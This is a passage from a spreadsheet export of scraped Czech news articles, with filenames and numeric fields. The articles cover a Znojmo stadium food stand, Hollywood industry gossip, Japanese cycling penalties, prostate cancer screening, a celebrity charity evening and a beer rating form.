Ale evidentně nakonec přišli na recept, jak mít spokojené manželství. Zdroje: super.cz , blesk.cz , idnes.cz , ahaonline.cz , kafe.cz , vlasta.cz , prozeny.cz , krajskelisty.cz</t>
  </si>
  <si>
    <t>20241101_118_3264505159_df91b2093b3f803af179.html</t>
  </si>
  <si>
    <t>df91b2093b3f803af179</t>
  </si>
  <si>
    <t>Bez piva i klobásy. Znojemští fanoušci přišli o občerstvení, na jak dlouho?</t>
  </si>
  <si>
    <t>Bez piva i klobásy. Znojemští fanoušci přišli o občerstvení, na jak dlouho? Osobnost Deníku Poprvé se to fotbalových příznivců dotkne v sobotu, kdy do Znojma zamíří rezerva Zlína . „Vážení fanoušci, v posledních dvou domácích zápasech první části sezony vám nebudeme moci nabídnout žádné nápoje ani občerstvení na stadionu, protože město nařídilo odstranění stánku. Omlouváme se za nepříjemnosti,“ informoval klub ve čtvrtek večer na sociálních sítích. Město však začalo situaci okolo stánku prověřovat právě na základě podnětu od klubu. „Tato věc se řeší z iniciativy klubu 1. SC Znojmo , jenž usiluje o zajištění občerstvení pro sportoviště nejen v době zápasů. V této souvislosti nás klub výslovně požádal o prověření formálního stavu současného dřevěného mobilního stánku s občerstvením. Tím pádem se přišlo na černou stavbu a bylo rozhodnuto o jejím odstranění. Město ani správce nekonal z vlastní iniciativy,“ uvedla tisková mluvčí města Petra Šuláková. Ve stejném duchu se vyjádřil i radní pro oblast sportu Jan Šťastník, který zároveň představil plány na úpravy v okolí stadionu. „Chystá se velká rekonstrukce oplocení v parku – od Corsa až ke sportovní hale. Při této revitalizaci se počítá i s novým stánkem na občerstvení, na který bude vypsáno výběrové řízení, do něhož se může kdokoliv přihlásit,“ vysvětlil. A dodal, že ho mrzí, jakým způsobem klub celou záležitost komunikoval. „Mrzí mě, že to fotbalový klub odprezentoval tak, že je to jen chyba města. Město sice rozhodlo o odstranění stánku, ale podnět podal klub,“ připomněl. Fortuna ČFL + MSFL Zástupci Okurkářů, tedy oficiálního fanklubu, o chystané změně věděli už několik týdnů. „Dle našich informací dostal provozovatel nařízeno stánek odvézt z důvodu rekonstrukce oplocení v jeho blízkosti a nyní bude probíhat výběrové řízení na nového provozovatele. Toto se dá označit za standardní postup a není na tom nic špatného,“ řekli exkluzivně pro Znojemský deník zástupci fanklubu, kteří nechtěli zveřejnit svá jména, redakce je však zná. Podle nich musel i klub vědět o odstranění stánku s předstihem. „Když už i my víme o konci stánku skoro měsíc dopředu, věděl to určitě dostatečně dopředu i klub a měl možnost zajistit adekvátní náhradu. V prohlášení klubu na Facebooku tak vidíme jen alibismus se snahou hodit veškerou vinu na město. Alespoň se v plné kráse ukazuje, jak klubu záleží na jeho fanoušcích,“ nebrali si servítky zástupci Okurkářů. play_fill Ostatní sporty Klub fanouškům při zbývajících dvou zápasech podzimní části sezony poskytne zdarma alespoň čaj a kávu. „Oslovili jsme tři různé provozovatele stánků, ale všichni odmítli, protože už mají stánky zazimované, nebo se jim provoz nevyplatí kvůli nízkému zisku. Budeme tedy fanouškům na zahřátí rozdávat alespoň čaj a kávu. Víc nejsme schopni udělat, protože se musíme soustředit na realizaci zápasu po sportovní stránce,“ uvedl sekretář klubu Radim Hübner. Kdy se tak fanoušci dočkají návratu občerstvení? „Nechci se zavazovat k určitému datu, ale udělám vše pro to, aby byl stánek do startu jarní části sezony znovu k dispozici,“ slíbil Šťastník. Autor: Markéta Weinlichová, Lubomír Budný Autoři person Markéta Weinlichová person Lubomír Budný</t>
  </si>
  <si>
    <t>8370</t>
  </si>
  <si>
    <t>6690</t>
  </si>
  <si>
    <t>20241101_119_3244874534_400b4754b81142ac12f3.html</t>
  </si>
  <si>
    <t>400b4754b81142ac12f3</t>
  </si>
  <si>
    <t>imf vs Hollywood #94: Ryan Reynolds vaří pivo, A.I. rozhoduje o miliardách a Warneři vítězí i prohrávají</t>
  </si>
  <si>
    <t>imf vs Hollywood #94: Ryan Reynolds vaří pivo , A.I. rozhoduje o miliardách a Warneři vítězí i prohrávají 16:00 | 01.11.2024 amazon bob iger disney hollywood imf legendary pictures netflix newsletter petr jákl prime video warner brothers Přehršle novinek ve stínu amerických voleb. Dojde na Margot Robbie , Clinta Eastwooda i Petra Jákla . Vítejte u další sklizně postřehů zpoza showbyznysové opony (delší verzi najdete v mém newsletteru hollywood101.substack.com, který vychází každou středu, a nově je k dispozici i pro předplatitele, jimž nabízí přístup do archivu a bonusový obsah!), aneb co všechno se událo v Hollywoodu za zavřenými dveřmi v uplynulém týdnu. Trochu se zpožděním, trochu rozdrobené, ale stále plné zajímavých informací. Předně díky všem, kdo mi k utěšenému stavu, naznačenému v minulém newsletteru, gratulovali. Ostatní snad pochopili, proč v posledních týdnech nebylo tempo na úplné špičce, ale zase bude líp. Tentokrát ale celá Amerika žije prezidentskými volbami a odráží se to i na hollywoodské šeptandě, takže když se tentokrát politice obloukem vyhneme, zůstává jen hrstka témat, která se možná netýkají aktuálních premiér, ale dlouhodobější trendy i choroby továrny na sny popisují poměrně trefně. Pojďme na to! Fotbal a pivo : Ryan Reynolds vidí do duše svých fandů Ryan Reynolds a Rob McElhenney prodávají menšinový podíl ve fotbalovém Wrexhamu (pořád jsou většinovými vlastníky, nebojte) newyorské miliardářské rodině Allynů a obratem za obdržené peníze kupují wrexhamský pivovar, který vaří pivo od roku 1882. Protože kam jdou fanoušci před zápasem nebo po něm? Správně. Je to další snaha obou výtečníků o utužování tamní komunity, takže pokud vám Reynolds na stříbrném plátně už leze krkem, chvalte ho alespoň za podobné snahy tužit kolektiv (a vydělávat další desítky milionů dolarů). Abychom nezačínali jednoodstavcovou novinkou, přidám k dobru jednu historku z desetiletého výročí Johna Wicka. Jedním z velkých investorů prvního filmu byla Eva Longoria ! Ano, když se dávaly dohromady peníze na skromný rozpočet jedničky, přidala hvězda seriálu Desperate Housewives štědrých šest milionů dolarů. Přiznává, že tehdy vůbec netušila, jak to celé funguje. Přišel za ní kamarád jejího agenta a řekl jí, že pokud chce do něčeho investovat, akční film od dvou kaskadérů je báječný nápad. Děkujte Evě , že na to naivně kývnula. Vydělala dvojnásobek vložené sumy a dodnes jí chodí šeky. Dnes ale není včera, takže herečka založila vlastní produkční label UnbeliEVAble, domluvila spolupráci s velkými studii i televizními značkami a vydělala spousty peněz, aby si pro dobro duše koupila (a tady je ten velký oslí můstek) podíl v losangeleském ženském fotbalovém týmu Angel City FC. Všechny cesty vedou na trávník. Bouřlivé výšiny filmových aukcí Další adaptaci románu Wuthering Heights nabalíčkoval MRC Entertainment, nezávislý label stojící např. za Baby Driverem, American Fiction nebo Saltburn. Tohle je taková předehra k placenému postu o first look deals (už je rozepsaný!), ale dneska je prostě standardem, že volní hráči na trhu připraví atraktivní balíček, v tomhle případě režisérka Saltburn (též MRC) Emerald Fennell slíbí atraktivní a kontroverzní verzi slavného románu (u nás jako Bouřlivé výšiny nebo Na Větrné hůrce), přemluví svou hvězdu ze Saltburn Jacoba Elordiho a dokonce i Margot Robbie . Takový balíček se nacení a pak se jde na aukci. Emerald Fennell ještě není jméno jako Nolan nebo Tarantino, ale po Saltburn je ve velmi výhodné pozici. Její snímek možná prohučel kiny, ale v onlinu se stal virální senzací. Režisérka ví, co chce mládež vidět a slyšet. A po tom se studia a streameři mohou utlouct. Aukce byla prý skutečně výživná, nejvíc peněz nabízel Netflix a Amazon, přičemž eNko šlo až na 150 milionů dolarů. A nakonec vyhráli Warneři, kteří nabízí skoro půlku zmíněné sumy. Tj. řekněme 80 milionů dolarů na produkci, jistě s výhodnými backendy pro herce a režisérku/scenáristku. Proč Emerald Fennell nekývnula nejštědřejšímu Netflixu nebo Amazonu , který proslavil Saltburn? Protože chce s filmem do kin. Netflix byl ochoten přeplatit všechny ostatní jako kompenzaci toho, že snímek půjde exkluzivně na jeho stream. Amazon nabízel kina, ale jen ve středním releasu (do 2000 kin) a se skromným marketingovým rozpočtem. Warneři nabídli na marketing skoro stejně peněz jako na samotnou produkci a to byl rozhodující parametr. Ta Margot Robbie tam mimochodem není náhodou, její produkční label LuckyChap má prsty ve všech filmech Emerald Fennell (včetně Promising Young Woman). A taky má first look deal s Warnery, ale to nakonec nehrálo roli, protože MRC je hlavní developer a LuckyChap má jen vedlejší roli. Ovšem ve chvíli, kdy se Margot uvolila, že si ve filmu zahraje, vystřelila jeho šance do nebes. A.I. okénko Dneska se toho sešlo v oblasti umělé inteligence víc, takže to bude takové Jednou větou mimo Jednou větou. Snad to nebude matoucí. Pokusím se vždy každé téma udržet v jednom odstavci. Robert Downey Jr. osobně investoval do několika A.I. startupů, ale prý jen do těch hodných, co to s lidstvem myslí dobře. Zároveň vzkázal, že on i Tony Stark zažalují zaživa i po smrti kohokoliv, kdo by chtěl na jejich podobě a manýrismech vydělávat peníze. Downey Jr. si prý díky přijetí role Dr. Dooma v nových Avengers ušetřil bokem slušnou sumičku na právníky, aby ho mohli hájit klidně i století po jeho skonu. Tak alespoň že vím, že budu mít o čem psát. Pokud si to nezařídíte a necháte s vaší pozůstalostí nakládat vlastní rodinu, může se vám stát, že budete “žít” věčně. Slavný moderátor Michael Parkinson se stane hvězdou nového podcastu Virtually Parkinson pouhý rok po své smrti. Jeho A.I. klon bude zpovídat celebrity ve “vzrušujícím novém formátu” z produkce startupu Deep Fusion. Jak poznáte, že ten druhý je z masa a kostí a nepovídají si dva roboti? Nepoznáte! A možná ani nebudete muset, protože podcast budou poslouchat jenom generovaní boti, aby se na Spotify nahnala poslechovost a vše se prohlásilo za úspěch. Po zombie internetu tu máme i zombie podcasty, v nichž pro živou duši už jaksi není místo. Nicolas Cage během proslovu k filmovým studentům varoval před tím, aby si nenechali vzít duši novým démonem, co obchází filmová studia a jmenuje se EBDR - Employment-Based Digital Replica. Už jsme o tom psali, ale opakování je matka moudrosti - produkce vás naskenuje od hlavy k patě, nechá vás podepsat stostránkovou smlouvu a domluví se s vámi na dvou natáčecích dnech, přičemž zbytek za vás obstará vaše digitální replika. Bez ní byste museli natáčet týden a dostali za to zaplaceno. Jenže bez vašeho souhlasu s tímhle procesem, roli nedostanete. Tahle oklika je schválená SAG-AFTRA, takže ani členství v odborech vám vlastně nepomůže, když za vámi stojí fronta těch, co na podobné zacházení kývnou. A když už mluvíme o strašidlech v Hollywoodu , Cinelytic je nový A.I. nástroj, který si mezi exekutivci získává čím dál tím větší oblibu. Tato aplikace slibuje vyřešit účetní rozvahu jedním kliknutím. Chystáte akční biják za třicet milionů dolarů a nevíte, kde začít? Napište jména pěti herců a aplikace vám spočítá jejich komerční potenciál, oblíbenost v jednotlivých regionech, poradí s buzzwords, taglines, napoví oblíbené zvraty, rekvizity a klišé. Tvůrci se zaklínají, že dovedou úspěšně odhadnout komerční potenciál většiny filmů uvedených do kin za poslední dekádu. A proto zvládnou “naprogramovat” i filmy budoucí. Zní to děsivě, ačkoliv analogové účetní rozvahy, vyráběné skutečnými lidmi, jsou taktéž chladnokrevnou kalkulací. Tohle je o pořádný krok, nebo spíše skok dál k robotické pásové výrobě filmů, co se podobají jako vejce vejci. Ano, autoritativního Asiata v hollywoodkých filmech VŽDY hraje Hiroyuki Sanada, ale pokud se nám tahle “lenost” rozšíří do všech odvětví, pak tu skutečně máme jen generátor náhodných scén a emocí. Sbohem a šáteček. Odsoudili Warneři poslední eastwoodovku? Ve zkratce: ano. Pokud hledáte ještě jeden důvod, proč nenávidět Davida Zaslava, tady ho máte. Ale ne tak rychle. Zřejmě poslední eastwoodova režisérská štace, Juror No. 2, byla původně zamýšlena exkluzivně na stream. Možná se teď divíte, protože Max obvykle celovečeráky pro stream nedělá. A nedělá je moc ani Disney+, takže nedávno mohlo někoho překvapit, že Young Woman and the Sea, byl defakto film koupený na stream, který ale po skvělých interních testovačkách šel narychlo a potichu na dva týdny do kin. Pak se hned objevil na Disney+ a je příjemně starosvětský, takže ho rád doporučím. Juror No. 2 měl potkat stejný osud. Zaslav s Eastwoodem , který má s Warnery skvělé vztahy padesát let, nevycházel už od první chvíle, když označil jeho předposlední film Cry Macho za nadbytečný a řekl, že Warneři jsou “in show business, not show friends”. Jinými slovy žádné kamarádíčkování a protekce za předchozí úspěchy. Bylo to chladné, hloupé a vůči tehdy devadesátiletému Eastwoodovi dost neuctivé. Exekutivci ovšem Zaslava stejně obešli a v kapsách našli třicet milionů na jeho čtyřicátý film na pozici režiséra (!). Soudní drama už dnes nepatří k diváckým žánrům, ostatně i poslední film Williama Friedkina - The Caine Mutiny: Court-Matrial - měl sice premiéru v Benátkách (měsíc po Friedkinově smrti), ale v USA šel rovnou na stream v rámci nabídky Paramount+. Eastwoodův Juror No. 2 se ale nakonec podívá do cca 50 kin, protože co kdyby se na Clintovu tvůrčí derniéru usmálo oscarové štěstí. Vypadá to jako kalkul, protože Warneři film nijak nepropagují, na jejich stránkách ho skoro nedohledáte a podle všech zdrojů se k němu žádná oscarová kampaň nechystá. Jistě, můžete si myslet, že Eastwoodova relevance je od deset let starého American Sniper spíše mizivá, ale Zaslav se v tom “show friends” zatraceně plete. Dobré vztahy s kreativci jsou v showbusinessu základ. Není náhodou, že mu Nolan utekl k Universalu a nehodlá se vracet. Jednou větou… Teenageři nemají k sexu na plátně důvěru, místo něj chtějí vidět víc hlubokých a smysluplným přátelství. Jde o anketu mezi 1500 americkými studenty ve věku 10 až 24 let. Pokud jste v devadesátkách měli vždy spadeno, až se nějaká slavná herečka v kritickém okamžiku své kariéry před kamerou svlékne, dneska na to můžete zapomenout. Erotika se z filmů vytrácí, zůstávají jen extrémy. Podle ankety si to koncový uživatel žádá. Aby ne, když za nahými těly může jít jinam (všichni vědí kam, ale kdybyste náhodou nevěděli, ptejte se kamaráda, nikoliv maminky). Lego ve spolupráci s Universalem natočí tři hrané celovečeráky. Režírovat bude Patty Jenkins (Wonder Woman), Jake Kasdan (Jumanji) nebo Joe Cornish (Attack the Block). Universal potřebuje novou sérii jako sůl, Lego chce prodat víc kostiček. Obě společnosti spolupracují už deset let, víceméně od premiéry Jurassíc World, kdy Lego začalo uvádět na trh oficiální jurské stavebnice. Vím to, protože je mám skoro všechny. Můj pětiletý syn ještě žádný Jurský park neviděl, ale skrz Lego už si vyspoileroval minimálně čtyři filmy. Tracking Gladiátora II (65 milionů za víkend) a muzikálového Wicked (85 milionů za víkend) naznačuje, že se skutečně schyluje k dalšímu Barbenheimeru, jakkoliv je to marketingově obrovsky na sílu, kulturně vyhladovělí lidé na to pravděpodobně skočí - zejména v USA , kde má divadelní Wicked obrovskou základnu fanoušků a velkolepé muzikály tu jsou tzv. kulturní institucí. Don’t Move na Netflixu je takový ten neurážející a skromný horor, který staví na absurdní zápletce a jménu Sama Raimiho na pozici producenta. Laciný (tak moc, že jsem to číslo bohužel nedohledal) horůrek se natáčel v Bulharsku a složilo se na něj tucet investorů, včetně… tramtadadá… Petra Jákla. Pak už stačí jen za rozumnou částku prodat na stream a shrábnout zisk. Halíře dělaj talíře. Tak doufám, ať už si o Žižkovi myslím cokoliv, že tyhle produkce Jáklovi vydělají na další režírování. A to je pro dnešek vše, přátelé. Že je toho málo? Předplatitelé dostávají každý týden v neděli nebo v pondělí malý report kinotržeb - proto v newsletteru chybí žebříčky (kdyby se seběhlo něco opravdu velikého, zmíním se o tom jinde). Středa/čtvrtek je ideálním dnem pro hlavní newsletter a pátek nebo víkend bude určený pro delší čtení nebo ohlížení do historie Hollywoodu . Autor: imf Autor person imf</t>
  </si>
  <si>
    <t>10920</t>
  </si>
  <si>
    <t>18130</t>
  </si>
  <si>
    <t>20241101_12_3264661508_57d66904442e1e6932e9.html</t>
  </si>
  <si>
    <t>57d66904442e1e6932e9</t>
  </si>
  <si>
    <t>Shrnutí Za jízdu pod vlivem až pět let. Japonsko vytáhlo do boje s nebezpečnými cyklisty Pokutu až 152 tisíc korun či dokonce pětiletý trest vězení mohou v Japonsku nově dostat cyklisté, kteří budou při jízdě používat mobilní telefon nebo pojedou pod vlivem alkoholu a způsobí nehodu. Nový zákon vešel v platnost v pátek a už má první uplatnění. Cyklostezka v Kodaiře v Japonsku (6. října 2016) | foto: Profimedia.cz Lidem, které policie přistihne při používání mobilního telefonu při jízdě na kole, od pátku nově hrozí vězení až na šest měsíců nebo pokuta až 100 tisíc jenů (přes 15 tisíc korun). Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok nebo budou muset zaplatit až 300 tisíc jenů (necelých 46 tisíc korun). Dosud byla maximální výše pokuty 50 tisíc jenů (více než 7 600 korun). Zákon přísněji postihuje také jízdu na kole pod vlivem alkoholu . Pokud policie naměří cyklistům více než 0,15 miligramu alkoholu v dechu, hrozí jim až tříletý trest vězení nebo pokuta až půl milionu jenů (přes 76 tisíc korun). Vážnější trestné činy zaviněné cyklistou s alkoholem v krvi mu mohou vynést až pět let vězení nebo finanční postih ve výši jeden milion jenů (přes 152 tisíc korun). Krátce poté, co zákon začal platit, oznámila policie v prefektuře Ósaka na jihu Japonska udělení první pokuty za jízdu pod vlivem alkoholu a vyšetřování dalších šesti případů. Podle Kjódó se stalo mezi lety 2013 až 2017 celkem 295 nehod, které způsobili cyklisté používající telefon. V letech 2018 až 2022 narostl počet nehod o 53,9 procenta na 454. V České republice jsou postihy výrazně mírnější. Pokud cyklista použije za jízdy mobilní telefon, hrozí mu pokuta až 10 tisíc korun. Pokud nadýchá do jedné promile, hrozí mu pokuta do 25 tisíc korun, nad jednu promile pak až 50 tisíc korun. Kč Autor: ČTK Autor ČTK Rubrika transition_slide Zprávy - Zahraničí</t>
  </si>
  <si>
    <t>20241101_120_3244874524_855dbf2d0ea492f6d50b.html</t>
  </si>
  <si>
    <t>855dbf2d0ea492f6d50b</t>
  </si>
  <si>
    <t>Movember upozorňuje na důležitost prevence rakoviny prostaty</t>
  </si>
  <si>
    <t>Movember upozorňuje na důležitost prevence rakoviny prostaty WhatsApp ILUSTRAČNÍ FOTO - pixabay Rakovina prostaty je nejčastější mužské onkologické onemocnění. Každoročně lékaři nádor prostaty odhalí u více než 8000 mužů, každý šestý z nich zemře. Listopad je tradičně věnován mužům a jejich zdraví. Možnost prevence odhalení nádoru v pozdním, obtížně léčitelném stadiu, připomíná v tento měsíc celosvětová osvětová kampaň Movember, při níž si řada mužů nechává narůst knír. Jde o symbol podpory celosvětové charitativní iniciativy, jejímž cílem je zvýšit povědomí o prevenci rakoviny prostaty a dalších závažných onemocnění mužů. »Rakovina prostaty je nejčastější mužské onkologické onemocnění. Včasné odhalení karcinomu prostaty, ještě před tím, než nádor začne metastázovat, dává pacientovi vysokou šanci na úplné uzdravení,« uvedla v tiskové zprávě mluvčí Všeobecné zdravotní pojišťovny ( VZP ) Viktorie Plívová . Dle dostupných dat VZP se počet mužů s rakovinou prostaty každým rokem zvyšuje. V loňském roce se s touto diagnózou léčilo 50 tisíc mužů, tj. o 36 % víc, než tomu bylo v roce 2014. Celkové náklady na léčbu dosahovaly 2,5 miliardy korun, nejvíc za uplynulých 10 let. Zdravotní pojišťovny od letošního roku hradí mužům preventivní vyšetření. »Tento program je zaměřen na muže ve věku 50 až 69 let včetně, které do něj může zařadit jak jejich praktický lékař, tak například ošetřující urolog, který je sleduje pro jiné zdravotní potíže,« uvedla Plívová . Právě tito lékaři by měli pacientům podrobně vysvětlit smysl programu a poučit je o průběhu vyšetření. Na základě tohoto se pak pacient rozhodne, zda se programu zúčastní. Za osm měsíců trvání se tohoto preventivního vyšetření zúčastnilo už 60 tisíc klientů VZP . Čtvrtina léčených pacientů je mladších 65 let Rakovinu může odhalit vyšetření z krve, které ukáže hladinu prostatického specifického antigenu (PSA). Při nízké hladině je muž pozvaný na další vyšetření za dva respektive čtyři roky. Pokud je hladina PSA vyšší než stanovená hodnota, převezme klienta do péče urolog. Ten provede následná vyšetření jako například sonografii. Na základě výsledků těchto vyšetření je stanoven další postup. V případě, že je stanovena diagnóza zhoubného karcinomu prostaty, je pacient předán do odborné péče onkologického zařízení. Příčiny vzniku rakoviny prostaty nejsou podle odborníků jasné, roli může hrát genetika nebo životní styl. Vliv bude mít zřejmě i složení stravy. Čtvrtina léčených pacientů je mladších 65 let. V Česku žije celkově asi 600 tisíc lidí, kteří se léčí nebo se vyléčili s některým druhem rakoviny. Riziko zvyšuje podle odborníků například kouření, nadměrné pití alkoholu nebo obezita. Přitom až 60 procentům případů rakoviny se dá prevencí a včasným záchytem zabránit. Některá vyšetření mohou odhalit už příznaky před nádorem, varovat může také úbytek váhy, nechutenství nebo bolesti zad. Podle lékařů budou v roce 2030 nádory nejčastější příčinou úmrtí, v současné době jsou na druhém místě za nemocemi srdce a cév. (jad) Autor: iportaL24.cz Rubrika transition_slide Domácí</t>
  </si>
  <si>
    <t>818</t>
  </si>
  <si>
    <t>989</t>
  </si>
  <si>
    <t>20241101_121_3245102477_7b334756eddc70789f5c.html</t>
  </si>
  <si>
    <t>7b334756eddc70789f5c</t>
  </si>
  <si>
    <t>ZPRÁVY - 1.11. v 16:00</t>
  </si>
  <si>
    <t>ZPRÁVY - 1.11. v 16:00 Další zprávy prima-cnn-news Piráti „grilují“ nového šéfa Hřiba. Jsi nevolitelný, děláš z nás TOP 09, zní z části strany Putin reaguje na úspěch Trumpa. Bude jednat o míru pod jednou podmínkou, tvrdí zdroje z Kremlu Tragický požár v ostravském bytě: V plamenech zahynul muž, příčina se vyšetřuje prima-zeny Marta Kubišová oslavila 82. narozeniny: Jsem ráda, že se probudím a všechno je tak, jak má být Jasmina Alagič v absolutních rozpacích. Můžeš si vzít vše, co chceš, řekne akrobatovi Zuzana Bubílková drsně odsoudila seznamky: Jsou pro zoufalce, myslí si prima-zoom Může pavouk skutečně usnout? Jak vypadala úplně první posilovna? U galerie nebudete věřit vlastním očím Žraloci zabíjejí vydry ve velkém, ale nežerou je. Záhada má prosté vysvětlení prima-fresh Hummus se smaženou cizrnou – perfektní chuťovka se hodí ke sklence vína i k míchaným koktejlům Zvěřinové recepty: Srnčí na houbách 12 nejbizarnějších jídel světa! Měli byste odvahu je ochutnat? prima-cool Legendární Warcraft dostane novou verzi Nová trilogie Star Wars dostala svého tvůrce. Podílel se na Deadpoolovi nebo Downeyho Sherlockovi Zemřel hororový Candyman. Tony Todd zářil i v Nezvratném osudu a Star Treku playboy Co vás čeká v listopadovém čísle magazínu Playboy? Jak se brzdí v zatáčce: Syn Michaela Schumachera řekl, co mu táta vždy radil Šokovaná Anna K. už viděla svatební fotky Tomáše Varteckého. Ví, že na místě nevěsty měla být ona lajk Jak získat a udržet si partnerku? Musíš hrát na domácím hřišti, radí Těhotnej kuchař Hana Gelnarová slaví vítězství v KSW. Polští fanoušci hovoří o krádeži Jak se doma chovat ráno po prohýřené noci? Těhotnej kuchař baví internet svou poradnou prima-living Autor: FTV Prima</t>
  </si>
  <si>
    <t>407550</t>
  </si>
  <si>
    <t>520200.00000000006</t>
  </si>
  <si>
    <t>20241101_122_3264795479_188aad6ad45dba249c29.html</t>
  </si>
  <si>
    <t>188aad6ad45dba249c29</t>
  </si>
  <si>
    <t>HORECA, ENOEXPO 2024</t>
  </si>
  <si>
    <t>HORECA, ENOEXPO 2024 Zveme Vás na virtuální kooperační akci při prestižním mezinárodním veletrhu z oboru potravinářství a HoReCa v polském Krakově . V období od 6. do 20. listopadu 2024 se můžete zúčastnit předem naplánovaných 30minutových B2B online schůzek a poznat nové zahraniční partnery. Akci organizuje Technická univerzita v Krakově ve spolupráci s mezinárodní sítí na podporu podnikání Enterprise Europe Network . Účast na akci je bezplatná. výroba potravin a nápojů: tradiční, bio, „free from“, funkční atd. potraviny (mražené, čerstvé, upravené) nealkoholické nápoje potravinářská a vinařská turistika víno (výrobci, distributoři, nákupčí, specializované prodejny) produkty a komponenty pro sektor HoReCa vybavení pro hotely, restaurace, kavárny cukrárny, pekárny a gastronomické prodejny, hotely služby (hotely/ubytovací zařízení, architektura, design) marketing, komunikace a poradenství obalová řešení prodejní automaty počítačové systémy a software pro hotely a stravovací služby audiovizuální zařízení a telekomunikace Bližší informace ke kooperační akci včetně registrace najdete ZDE. Kontakt pro více informací Autor: dvorakja@plzen.eu Autor person dvorakja@plzen.eu</t>
  </si>
  <si>
    <t>174</t>
  </si>
  <si>
    <t>191</t>
  </si>
  <si>
    <t>20241101_123_3244792459_d19cf280bdf6201b6a6a.html</t>
  </si>
  <si>
    <t>d19cf280bdf6201b6a6a</t>
  </si>
  <si>
    <t>Hvězdy a slivovice: Pohublý Kratina, zamilovaná Formanová a Konvalinková v kůži!</t>
  </si>
  <si>
    <t>Hvězdy a slivovice: Pohublý Kratina, zamilovaná Formanová a Konvalinková v kůži! Charitativní moravský večer v pražském Muzeu slivovice přilákal spoustu známých tváří, které nejenom podpořily dobrou věc, ale i hodně ochutnávaly moky. Vdova po Miloši Formanovi (†86) Martina (56) přišla ruku v ruce s novým partnerem Jirkou (59). Proslavený řidič kombajnu Drtikol z filmu Prázdniny pro psa by už asi strach nikomu nenahnal. Zub času se na Vladimíru Kratinovi (72) hodně podepsal. Herec je pohublý, má propadlé tváře, ale víno mu stále chutná a na party v Muzeu slivovice na Malé straně v Praze si ho dopřál. „ Víno je mým koníčkem, moc se mi líbí ta jeho nekonečnost a variabilita,“ řekl týdeníku 5plus2 Kratina, když slavil sedmdesátku. Na charitativní party dorazil sám, ale o společnost kolegyň neměl nouzi. Vdova po oscarovém režisérovi Formanovi Martina vyvedla svého přítele Jirku. „Teď je to půl roku, máme nasazené růžové brýle. Ale je to hrozně hezké. Fakt už jsem nepočítala s takovou romantickou kapitolou v mém životě,“ řekla pro super.cz spisovatelka, která chystá seriál pro Českou televizi a bude se natáčet v dubnu. Dobrou náladou sršela Naďa Konvalinková (73), která zvolila poněkud netradiční komplítek. Černý outfit doplnila černou sukní a kabátem z kůže. Herečka se nikdy trendy neřídila a nosí to, v čem se cítí dobře. Pohled na nestárnoucí manžele Hudečkovy bral dech. Bývalá herečka Eva (74) zřejmě potají popíjí elixír mládí, protože vypadá už drahné roky stejně. S manželem, houslistou Václavem (72) letos oslavili 47 let v manželství. Adriana Sobotová (63) zase do společnosti chodí sama, protože její muž Luděk Sobota (81) tráví čas nejraději doma. Markéta Reinischová, Elmer Carvalho Dvojnásobný dědeček Kratina (70): Dovolenou stráví s nejmladší dcerou (20)! Profimedia.cz profimedia.cz facebook.cz Instagram instagram Blesk:Martin Hykl/ CZECH NEWS CENTER CNC / Martin Hykl ČTK / Kubeš Slavomír Blesk:David Kundrat/ CZECH NEWS CENTER CNC / David Kundrát, Pavel Machan, Marek Pátek, Martin Hykl ara archiv Blesku Michal Protivanský Martin Hykl Blesk:David Kundrat/ CZECH NEWS CENTER CNC_Martin Hykl Charitativní večer Korunka pomáhá Vladimír Kratina Naďa Konvalinková Naďa Konvalinková , Veronika Crha-Záhorská, Hanka Křížková a Libuše Švormová Manželé Hudečkovi Martina Formanová s partnerem Adriana Sobotová a Václav Hudeček Martin Dejdar Kateřina Kaira Hrachovcová Miluše Bittnerová a Vladimír Kratina Hudečkovi s Martinou Formanovou Libuše Švormová s manželem Martina Formanová je zamilovaná až po uši Martina Formanová s partnerem letěli na Madeiru Libuše Švormová a Jan Patera Libuše Švormová v lóži Městského divadla. Herci Jaroslav Satoranský a Libuše Švormová v lóži Městského divadla. Libuše Švormová Libuše Švormová , Jan Patera a Petr Kostka Libuše Švormová s Miroslavem Mejzlíkem Premiéra filmu Buď chlap: Naďa Konvalinková a Tereza Ramba Premiéra filmu Buď chlap: Naďa Konvalinková a Igor Bareš Premiéra filmu Buď chlap: Naďa Konvalinková a Ondřej Sokol Premiéra filmu Buď chlap: Tereza Ramba s Naďou Konvalinkovou a Ester Geislerovou Premiéra filmu Buď chlap: Tereza Ramba s Naďou Konvalinkovou Tisková konference České televize k představení vánočního programu: Naďa Konvalinková a Karel Janák Tisková konference České televize k představení vánočního programu: Naďa Konvalinková Tisková konference České televize k představení vánočního programu: Jiřina Bohdalová a Iva janžurová Autor: lara Autor person lara Rubrika transition_slide České celebrity</t>
  </si>
  <si>
    <t>548000</t>
  </si>
  <si>
    <t>20241101_124_3244741422_eeaa31339c2cc13ee850.html</t>
  </si>
  <si>
    <t>eeaa31339c2cc13ee850</t>
  </si>
  <si>
    <t>Mejto pšeničné 11°</t>
  </si>
  <si>
    <t>Mejto pšeničné 11° jsem v: lahvové / čepované: z čepu "no name": v obyčejné restauraci (Degustace není možná) z čepu "v ráji pivaře": v místě se silnou pivní kulturou (specializované restaurace, síť značkových restaurací, pivní studia a kluby, speciální akce, např. pivní festy, degustace...) z čepu "pod komínem": jen v místě, kde se pivo vaří (vč. pivovarské restaurace) komentář: maximálně 1000 znaků nic jsi nevybral na škále hvězdiček nebo</t>
  </si>
  <si>
    <t>1170</t>
  </si>
  <si>
    <t>517000</t>
  </si>
  <si>
    <t>20241101_125_3371112381_29513e51e3d6a47150fd.html</t>
  </si>
  <si>
    <t>29513e51e3d6a47150fd</t>
  </si>
  <si>
    <t>Víno André REZERVA 2021, moravské zemské víno, Vinařství Josef Licek</t>
  </si>
  <si>
